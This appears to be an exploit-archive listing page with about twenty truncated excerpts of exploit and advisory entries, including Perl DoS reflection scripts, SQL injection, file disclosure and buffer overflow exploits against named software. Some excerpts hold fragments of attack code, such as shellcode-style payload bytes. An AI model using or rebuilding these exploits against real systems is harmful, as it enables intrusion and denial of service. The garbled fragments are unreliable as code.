Counter-Strike 1.6 GameInfo Query Reflection Denial Of Service Exploit

Exploit for multiple platform in category dos / poc !/usr/bin/perl Counter-Strike 1.6 'GameInfo' Query Reflection DoS Proof Of Concept Copyright 2015 c Todor Donev email protected http://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg http://pastebin.com/u/hackerscommunity...

UPNPD M-SEARCH ssdp:discover Reflection Denial Of Service

!/usr/bin/perl upnpd M-SEARCH ssdp:discover reflection Copyright 2015 c Todor Donev [email protected] http://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg The SSDP protocol can discover Plug & Play devices, with uPnP Universal Plug and Play. SSDP is HTTP like protocol and...

UPNPD M-SEARCH - ssdp:discover Reflection Denial of Service

UPNPD M-SEARCH - ssdp:discover Reflection Denial of Service !/usr/bin/perl upnpd M-SEARCH ssdp:discover reflection Copyright 2015 c Todor Donev [email protected] http://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg The SSDP protocol can discover Plug & Play devices, with...

File Roller 3.4.1 Denial Of Service

!/usr/bin/perl Title: File Roller - DoS PoC Date: 08/07/2015 Author: Arsyntex Homepage: https://wiki.gnome.org/Apps/FileRoller Version: v3.4.1 Tested on: Linux lab 3.2.0-85-generic-pae 122-Ubuntu i686 i386 GNU/Linux ------------------------------------------------------------------------- Create ...

ClickHeat 1.13+ - Remote Command Execution

Clickheat 1.13+ Unauthenticated RCE ----------------------------------- The Clickheat developers have been informed, but have not responded to my email. The code has not been updated recently and the project seems to be in an abandoned state. I have discovered a vulnerability in Clickheat 1.13...

Alienvault OSSIM/USM Multiple Vulnerabilities

Details ======= Product: Alienvault OSSIM/USM Vulnerability: Multiple Vulnerabilities XSS, SQLi, Command Execution Author: Peter Lapp, [email protected] CVE: None assigned Vulnerable Versions: Tested on 4.14, 4.15, and 5.0. It likely affects all previous versions as well. Fixed Version: No fix ha...

Tiny Server 1.1.9 - Arbitrary File Disclosure Exploit

Exploit for windows platform in category remote exploits !/usr/bin/perl -w Title : Tiny Server v1.1.9 Arbitrary File Disclosure Exploit Download : http://tinyserver.sourceforge.net/tinyserverfull.zip Author : ZoRLu Test : Windows7 Ultimate Date : 29/11/2014 BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLe...

Shellshock Exploits Used Against SMTP Servers at Webhosts

The persistence of the Shellshock vulnerability remains high more than a month after it first surfaced. The latest attacks involved SMTP servers belonging to web hosts, said a report published by the SANS Internet Storm Center. Attackers are using Shellshock exploits targeting the now infamous...

Toast Forums Database Disclosure

!/usr/bin/perl -w Toast Forums Database Disclosure Exploit Author : indoushka Vondor : ToastForums.com use LWP::Simple; use LWP::UserAgent; system'cls'; system'Toast Forums Database Disclosure Exploit'; system'color a'; if@ARGV new; my $request = $useragent-get$url,":contentfile" = "D:/data.mdb";...

Usermin Null Byte Filtering Information Disclosure

The version of Usermin installed on the remote host is affected by an information disclosure vulnerability due to the Perl script 'miniserv.pl' failing to properly filter null characters from URLs. An attacker could exploit this to reveal the source code of CGI scripts, obtain directory listings,...

Usermin 'miniserv.pl' Arbitrary File Disclosure

The Usermin install on the remote host is affected by an information disclosure flaw in the Perl script 'miniserv.pl'. This flaw could allow a remote, unauthenticated attacker to read arbitrary files on the affected host, subject to the privileges of the web server user id. %NASLMINLEVEL 70300 C...

LSE Leading Security Experts GmbH - LSE-2014-07-13 - Granding Grand MA 300 - Weak Pin Verification

=== LSE Leading Security Experts GmbH - Security Advisory 2014-07-13 === Grand MA 300 Fingerprint Reader - Weak Pin Verification ------------------------------------------------------------------------ Affected Versions ================= Grand MA 300/ID with firmware 6.60 Issue Overview...

Grand MA 300 Fingerprint Reader Weak PIN Verification

=== LSE Leading Security Experts GmbH - Security Advisory 2014-07-13 === Grand MA 300 Fingerprint Reader - Weak Pin Verification ------------------------------------------------------------------------ Affected Versions ================= Grand MA 300/ID with firmware 6.60 Issue Overview...

Stockman Shopping Cart 7.8 Arbitrary Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7485/info Stockman Shopping Cart has been reported prone to a remote command execution vulnerability. This issue presents itself in the 'shop.plx' script. The problem results from a lack of sufficient sanitization perform...

Klinza Professional CMS <= 5.0.1 (show_hlp.php) File Include Exploit

No description provided by source. !/usr/bin/perl ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:+ +...

Subdreamer 2.2.1 - SQL Injection / Command Execution Exploit

No description provided by source. !/usr/bin/perl Subdreamer 2.2.1 command exec exploit @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ supported targets: without forum integration with phpBB2 integration with ipb2 integration with vbulletin2 integration...

IP Reg <= 0.4 - Remote Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl ----------------------------------------------- IP Reg = 0.4 Blind SQL Injection Exploit Discovered By StAkeR - StAkeRathotmaildotit Discovered On 03/10/2008 ----------------------------------------------- Download...

Golden FTP Server <= 2.02b Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl -w Barabas - www.whitehat.co.il - cheers to muts and all peeps at WH. XPSP2 goldenftpserver sploit - bind 4444 use strict; use Net::FTP; my $payload=\x41x260; $payload .=\x65\x82\xa5\x7c;jmpesp $payload .=\x90x32;not really necessary...blah...

vBulletin DoS - all version

No description provided by source. DOS Vbulletin 92% Works ; Tested on all versions! and can DOS the server Perl Script use Socket; if @ARGV 2 &usage $rand=rand10; $host = $ARGV0; $dir = $ARGV1; $host = s/http:////eg; for $i=0; $i10; $i-- $user=vb.$rand.$i; $data = s= ; $len = length $data; $foo...

gAlan 0.2.1 - Buffer Overflow 0day Exploit

No description provided by source. !/usr/bin/perl kpasa.pl AKA gAlan Buffer Overflow 0day Exploit Jeremy Brown [email protected]//jbrownsec.blogspot.com//krakowlabs.com 12.07.2009 From Static Analysis to 0day Exploit Originally a SecurityTubeCon Presentation, which I'm guessing was canceled...